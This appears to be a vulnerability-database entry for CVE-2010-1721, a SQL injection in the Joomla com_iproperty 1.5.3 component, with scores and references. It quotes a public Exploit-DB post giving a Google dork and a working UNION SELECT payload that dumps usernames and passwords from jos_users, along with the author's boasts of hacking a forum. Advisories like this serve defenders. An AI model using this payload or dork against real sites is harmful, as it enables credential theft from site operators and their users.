CVE-2010-1721
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in the Intellectual Property (aka IProperty or com_iproperty) component 1.5.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an agentproperties action to index.php.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Intellectual Property 1.5.3 - 'id' SQL Injection
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : April, 15-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Thinkery Intellectual Property
Vendor : http://iproperty.thethinkery.net/
Price : $225 USD
Version : 1.5.3 Other versions may also be affected
Google Dork : inurl:com_iproperty
Intellectual Property allows independent real estate agents, brokers, or property
management companies to upload and maintain property listings for sale, for rent and for lease.
Upload photos, add categories, sub-categories, agent profiles, company profiles.
Search with an advanced Google Map-Ajax-based map interface. Allow users to save and
manage favorite properties. Quickly customize colors, filters, galleries and more!
----------------------------------------------------------------
Exploitz:
~~~~~~~
-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_iproperty&view=agentproperties&id=[elich4]
----------------------------------------------------------------
Shoutz:
~~~~
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by Us,lulz...'
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR [tumben ga bawa martabak??],mywisdom,yadoy666,udhit
- elicha cristia [me too... :)]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| thethinkery | com_iproperty | 1.5.3 | |
| joomla | joomla\! | | |
References
- http://extensions.thethinkery.net/
- http://osvdb.org/63750
- http://secunia.com/advisories/39427
- http://www.exploit-db.com/exploits/12246
- http://www.securityfocus.com/bid/39495
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57875
- http://extensions.thethinkery.net/
- http://osvdb.org/63750
- http://secunia.com/advisories/39427
- http://www.exploit-db.com/exploits/12246
- http://www.securityfocus.com/bid/39495
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57875
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.